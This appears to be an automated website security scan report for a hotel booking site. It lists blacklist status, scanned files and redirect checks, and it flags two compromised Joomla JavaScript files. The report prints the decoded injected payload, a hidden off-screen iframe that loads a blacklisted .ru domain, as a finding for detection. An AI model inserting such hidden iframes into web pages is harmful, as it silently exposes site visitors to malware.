Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=bukitmertajamhotel.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://bukitmertajamhotel.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://bukitmertajamhotel.com/ | 200 OK Content-Length: 23150 Content-Type: text/html | clean |
http://bukitmertajamhotel.com/modules/mod_jvslideshow/assets/js/jd.gallery.js | 200 OK Content-Length: 27114 Content-Type: application/javascript | clean |
http://bukitmertajamhotel.com/modules/mod_jvslideshow/assets/js/jd.gallery.transitions.js | 200 OK Content-Length: 5818 Content-Type: application/javascript | clean |
http://bukitmertajamhotel.com/templates/jv_winto/jv_menus/jv_moomenu/jv.moomenu.js | 200 OK Content-Length: 4619 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
var subnav = new Array();
Element.extend(
{
    doActive: function () {
        this.className+=' hover';
    },
    doDeactive: function () {
        this.className=this.className.replace(new RegExp("hover\\b"), "");
    },
    hide: function(timeout) {
        this.status = 'hide';
        clearTimeout (this.timeout);
        if (timeout) {
            this.timeout = setTimeout (this.animation.bind(this), timeout);
        }else{
            this.animation();
        }
    },
Antivirus reports:
http://bukitmertajamhotel.com/templates/jv_winto/js/jv.script.js | 200 OK Content-Length: 6473 Content-Type: application/javascript | clean |
http://pagead2.googlesyndication.com/pagead/show_ads.js | 200 OK Content-Length: 21219 Content-Type: text/javascript | clean |
http://ajaxsearch.partners.agoda.com/partners/SearchBox/Scripts/Agoda.SearchBoxV2.js | 200 OK Content-Length: 20444 Content-Type: application/x-javascript | clean |
http://connect.facebook.net/en_US/all.js | 200 OK Content-Length: 167017 Content-Type: application/x-javascript | clean |
http://platform.twitter.com/widgets.js | 200 OK Content-Length: 99120 Content-Type: application/javascript | clean |
http://platform.linkedin.com/in.js | 200 OK Content-Length: 3711 Content-Type: text/javascript | clean |
http://bukitmertajamhotel.com/how-to-go.html | 200 OK Content-Length: 26115 Content-Type: text/html | clean |
http://bukitmertajamhotel.com/Penang-Hotels/b-suite-hotel-penang.html | 200 OK Content-Length: 19709 Content-Type: text/html | clean |
http://bukitmertajamhotel.com/plugins/content/extravote/extravote.js | 200 OK Content-Length: 3914 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: jqueryjsscript.ru
function JVXVote(id,i,total,total_count,xid,counter){
    var currentURL = window.location;
    var live_site = currentURL.protocol+'//'+currentURL.host+sfolder;
    var lsXmlHttp = '';
    var div = document.getElementById('extravote_'+id+'_'+xid);
    if (div.className != 'extravote-count voted') {
        div.innerHTML='<img src="'+live_site+'/plugins/content/extravote/loading.gif" border="0" align="absmiddle" /> '+'<sm ...[3748 bytes skipped]...
Decoded script:
<div style="position:absolute; top:-508px;"><iframe src="http://jqueryjsscript.ru/"></iframe></div>
http://bukitmertajamhotel.com/Penang-Hotels/berjaya-penang-hotel.html | 200 OK Content-Length: 19733 Content-Type: text/html | clean |
http://bukitmertajamhotel.com/Penang-Hotels/1926-heritage-hotel.html | 200 OK Content-Length: 19722 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: bukitmertajamhotel.com
Result:
HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Fri, 27 Jun 2014 10:41:03 GMT
Pragma: no-cache
Server: Apache
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 27 Jun 2014 10:41:04 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 720815e97ed86ff74b903abba008a61f=092f6c2c8b834a9cae9825d1bb02a476; path=/
Set-Cookie: jv_winto_tpl=jv_winto; expires=Wed, 17-Jun-2015 10:41:04 GMT; path=/
X-Powered-By: PHP/5.2.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: bukitmertajamhotel.com
Referer: http://www.google.com/search?q=bukitmertajamhotel.com
Result:
The result is similar to the first query. There are no suspicious redirects found.